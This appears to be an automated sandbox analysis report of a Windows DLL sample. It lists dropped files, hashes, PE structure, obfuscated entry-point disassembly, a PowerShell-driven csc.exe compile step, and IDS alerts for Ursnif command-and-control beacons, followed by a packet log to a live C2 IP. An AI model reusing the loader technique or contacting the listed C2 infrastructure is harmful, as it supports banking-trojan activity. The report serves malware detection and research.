                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.0.cs"
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):3584
                              Entropy (8bit):2.59433860543945
                              Encrypted:false
                              SSDEEP:24:etGSV/u2Bg85z7xlfwZD6sgdWqtkZfoAWI+ycuZhNyakS6PNnq:6oYb5hFCD6FWdJo71ulya32q
                              MD5:56795B9251ADDEDC268AA628E143A9C5
                              SHA1:16973C86A02C9B3D307AA25A3ADAD1F0F05F1325
                              SHA-256:E28D2E06D00EA056EE86C6793AED037BD75A6DFD1D63100378CDDE049C5A7C9E
                              SHA-512:D0584C6B57A34BB7A3224B739870A4CB6BC87DA8A4D355C3A72AEED08106D3C019096A5627AB26D6CC007EF907725149BB21FF85E4D1D82BABA33923C0778051
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.sb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):868
                              Entropy (8bit):5.3308047202087225
                              Encrypted:false
                              SSDEEP:12:xKIR37Lvkmb6KzsWZE2MKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzdE2MKaM5DqBVKVrdFAMBJTH
                              MD5:AE184BFF32F3C82CDA83A7144041CC02
                              SHA1:EF366BDA7BD2A422BFF17C7DB20654DDF60A9507
                              SHA-256:EB31DBB8E96AB2747B6EA1425C55A681AC498DF8FC584F80075D000304F4B14E
                              SHA-512:91914CF1BD9069C69248288D4B0AFBF21A65DDEA90BFF2E9AAA24ADA08AE11580500A660418168C6DDCAAFF45F8EAE6813BE109C4A20C23ECB890E6DE4BD3439
                              Malicious:false
                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):652
                              Entropy (8bit):3.0972257160637633
                              Encrypted:false
                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryexak7Ynqqj2PN5Dlq5J:+RI+ycuZhNyakS6PNnqX
                              MD5:41270E964816EC4C69225C4FC492514E
                              SHA1:EA9457F4CBF230C99D3E4FF885FDE46E4BD45000
                              SHA-256:41C6EE9B67E14F9616F9DD92586532D396E13BFE8F1D4B97C2930FA89ED740F1
                              SHA-512:801BE92E1AE02CB2C71A1C8424A117F128AE761DC04FAD1503622F8AA0C934C9E96E9CD783ADB2060CFA0F3F28AA2E413782C1068AAE2EDF237CE640C70CF4A6
                              Malicious:false
                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.x.a.i.b.b.0.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.x.a.i.b.b.0.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                              Category:dropped
                              Size (bytes):1332
                              Entropy (8bit):4.000171492218837
                              Encrypted:false
                              SSDEEP:24:HPizW9NProXxUuHjhKdNII+ycuZhNyoakST9PNnq92d:lProXCutKdu1ulna3rq9G
                              MD5:D782BF3D7A8FDEB2AD18B0604344ECE8
                              SHA1:424D88E90F7ECD6BF89F3DB4F71881A007BFC402
                              SHA-256:5CF40AEAD24C13B102AD673AA371346B32E26D5BDF3D279B706C1F18B5AA15FB
                              SHA-512:6C2507E2313D03B691F0826C157C98BCE9F9C0ADFD029D0E5446CBB5E7DD6724D765AAF34426F5E53B58FEB35E192AC725578825A51E3AE2E16AF3C30E863F9C
                              Malicious:false
                              Preview:L...'.sb.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP...................j..........SI...........5.......C:\Users\user\AppData\Local\Temp\RES109F.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.t.b.3.q.i.q.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                              Category:dropped
                              Size (bytes):1332
                              Entropy (8bit):3.9829744790376203
                              Encrypted:false
                              SSDEEP:24:HhizW9N7izUuHYFhKdNII+ycuZhNyakS6PNnq92d:TezUu4zKdu1ulya32q9G
                              MD5:EE9EDF850E8759E45C86B471C8A75C98
                              SHA1:450268A4ED02C66CD38EAB0754C27752A558A0B2
                              SHA-256:9377B7E127BD8E34E1182E164391BFF0EC2E55A1037FDED981D8C489251A0B7D
                              SHA-512:EF6F71F1E7454FE4AC2A7A34AEC2672DF8AA4F980B0116DA82E1D2D611899FBB9894D0CC59F4F37B75DD418F42C20DED9BDE9B359491AD7DB6EA9CD4804353EB
                              Malicious:false
                              Preview:L...1.sb.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP..................A'..H..Li"\O.QN..........5.......C:\Users\user\AppData\Local\Temp\RES37BE.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.x.a.i.b.b.0.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview:1
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview:1
                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.238626608026645
                              TrID:
                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                              • Generic Win/DOS Executable (2004/3) 0.20%
                              • DOS Executable Generic (2002/1) 0.20%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:tIJVb0BvkI.dll
                              File size:442368
                              MD5:f28f39ada498d66c378fd59227e0f215
                              SHA1:1c9c0584ad51f5be3f16b334d758c88b8cdb7b38
                              SHA256:0a66e8376fc6d9283e500c6e774dc0a109656fd457a0ce7dbf40419bc8d50936
                              SHA512:33e4035a35c204da87d5c5935dcc81020101cfb9001a1f08c6fe5c374d1bfaa888783c7d735d43de483d5b6235e883e797e0855bed548ff4aa8dbab1b8addf1b
                              SSDEEP:6144:rFpWDfyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rFpoFlJqYhiVDwGU8OqaX1WW3zNg7
                              TLSH:5594F14977A11DBBEC0807761CF8C52B9B66BE2CA23A31DEA6683CFF7E175511048706
                              File Content Preview:MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5......
                              Icon Hash:9068eccc64f6e2ad
                              Entrypoint:0x401430
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:0bedc9af0ed7cf2ba33cf662a24d448e
                              Instruction
                              push ebp
                              mov ebp, esp
                              add ecx, FFFFFFFFh
                              call 00007F191498005Ch
                              pop eax
                              pop eax
                              mov dword ptr [00414544h], eax
                              mov edx, dword ptr [00414660h]
                              sub edx, 00005289h
                              call edx
                              ret
                              int3
                              push esi
                              mov eax, ebx
                              mov dword ptr [00414540h], eax
                              pop dword ptr [00414538h]
                              mov dword ptr [00414548h], ebp
                              mov dword ptr [0041453Ch], edi
                              sub dword ptr [00414548h], FFFFFFFCh
                              loop 00007F1914980005h
                              mov dword ptr [ebp+00h], eax
                              nop
                              pushfd
                              dec esp
                              mov bh, byte ptr [edx+20858137h]
                              inc edi
                              outsb
                              popad
                              adc bh, byte ptr [ebx-737236FDh]
                              rcr byte ptr [ebp-09h], 0000006Eh
                              xor dword ptr [edi+2C9A727Dh], edx
                              push edi
                              and eax, 921D5B11h
                              push ds
                              cmc
                              cdq
                              jmp 00007F19149800B1h
                              pop ebx
                              xor dword ptr [edx+72h], edi
                              ficom dword ptr [ecx+335A9032h]
                              jnp 00007F1914980087h
                              mov bl, 02h
                              ret
                              xchg eax, ebp
                              mov al, byte ptr [61B7C6D2h]
                              jnc 00007F191498002Fh
                              mov edx, 52F2559Ch
                              sti
                              sbb dword ptr [ecx+04h], ebp
                              pop ebx
                              inc esp
                              inc esi
                              dec edi
                              fsubr dword ptr [ebx]
                              cmovne ecx, eax
                              in al, D3h
                              jnl 00007F1914980048h
                              xchg eax, esi
                              xchg eax, esi
                              inc eax
                              pop es
                              cmpsd
                              pop edi
                              das
                              and byte ptr [esi-7Ch], bh
                              pop ecx
                              je 00007F1914980024h
                              pop esp
                              jl 00007F19149800BEh
                              xor al, byte ptr [esi+2Ch]
                              out dx, al
                              mov edi, F721E51Fh
                              pop esi
                              or dword ptr [edi+35h], ecx
                              scasb
                              rcl byte ptr [esi+7Ch], 00000040h
                              popfd
                              int3
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xdc180x8c.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x9f28.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000xf0c.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xd0b00x38.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0xd0000xb0.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x10000x1.text
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000xb7100xc000False0.0736897786458data1.02203160805IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rdata0xd0000x10730x2000False0.180541992188data3.71589026365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xf0000x79d00x6000False0.373697916667data6.02717783396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .crt0x170000x1dc8e0x1e000False0.988427734375data7.9815287954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .erloc0x350000x2ca4f0x2d000False0.988259548611data7.98122243943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .rsrc0x620000x9f280xa000False0.602783203125data6.51663069246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x6c0000x132e0x2000False0.219360351562data3.73577949218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountry
                              RT_BITMAP0x623600x666dataEnglishUnited States
                              RT_ICON0x629c80x485dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                              RT_ICON0x672280x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544EnglishUnited States
                              RT_ICON0x697d00xea8dataEnglishUnited States
                              RT_ICON0x6a6780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                              RT_ICON0x6af200x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                              RT_DIALOG0x6b4880xb4dataEnglishUnited States
                              RT_DIALOG0x6b5400x120dataEnglishUnited States
                              RT_DIALOG0x6b6600x158dataEnglishUnited States
                              RT_DIALOG0x6b7b80x202dataEnglishUnited States
                              RT_DIALOG0x6b9c00xf8dataEnglishUnited States
                              RT_DIALOG0x6bab80xa0dataEnglishUnited States
                              RT_DIALOG0x6bb580xeedataEnglishUnited States
                              RT_GROUP_ICON0x6bc480x4cdataEnglishUnited States
                              RT_VERSION0x6bc980x290MS Windows COFF PA-RISC object fileEnglishUnited States
                              DLLImport
                              KERNEL32.dllEraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak
                              OLEAUT32.dllGetRecordInfoFromTypeInfo, LoadTypeLibEx
                              USER32.dllDefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo
                              GDI32.dllExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment
                              ADVAPI32.dllEnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA
                              msvcrt.dllstrcoll, fgetwc, srand
                              DescriptionData
                              LegalCopyright A Company. All rights reserved.
                              InternalName
                              FileVersion1.0.0.0
                              CompanyNameA Company
                              ProductName
                              ProductVersion1.0.0.0
                              FileDescription
                              OriginalFilenamemyfile.exe
                              Translation0x0409 0x04b0
                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States
                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              05/04/22-16:27:52.293372 05/04/22-16:27:52.293372TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4973880192.168.2.513.107.42.16
                              05/04/22-16:28:12.405919 05/04/22-16:28:12.405919TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975880192.168.2.5185.189.151.28
                              05/04/22-16:28:12.829578 05/04/22-16:28:12.829578TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975880192.168.2.5185.189.151.28
                              TimestampSource PortDest PortSource IPDest IP
                              May 4, 2022 16:28:12.382318974 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.405189991 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.405378103 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.405919075 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.428312063 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702059031 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702090979 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702105045 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702121019 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702136993 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702148914 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702167034 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702183008 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702203035 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702209949 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.702255011 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.702266932 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.702269077 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702271938 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.702327967 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.702478886 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702497005 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702508926 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702523947 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.702532053 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.702567101 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.702583075 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.724806070 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.724833012 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.724847078 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.724864006 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.724880934 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.724905014 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725003004 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725048065 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725060940 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725080967 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725092888 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725120068 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725162983 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725205898 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725224972 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725238085 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725264072 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725292921 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725359917 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725378990 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725403070 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725414038 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725431919 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725497961 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725514889 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725526094 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725553036 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725569963 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725687027 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725738049 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725744009 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725750923 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725786924 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725850105 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725867987 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725879908 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.725903034 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725924969 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.725980997 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.726032019 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.726035118 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.726043940 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.726079941 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.726136923 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.726154089 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.726165056 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.726188898 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.726208925 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.747716904 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.747744083 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.747756958 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.747775078 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.747792006 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.747803926 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.747845888 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.747883081 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.747888088 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.747894049 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.747908115 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.747920036 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.747967005 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.747973919 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.747977018 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.747989893 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748003006 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748045921 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.748080015 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.748193979 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748214006 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748224974 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748243093 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748244047 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.748267889 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.748290062 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.748307943 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748327017 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748339891 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748358965 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748369932 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.748378038 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748389959 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.748397112 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748410940 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748435974 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.748473883 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.748517990 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748537064 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748553038 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748568058 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748568058 CEST4975880192.168.2.5185.189.151.28
                              May 4, 2022 16:28:12.748598099 CEST8049758185.189.151.28192.168.2.5
                              May 4, 2022 16:28:12.748609066 CEST4975880192.168.2.5185.189.151.28
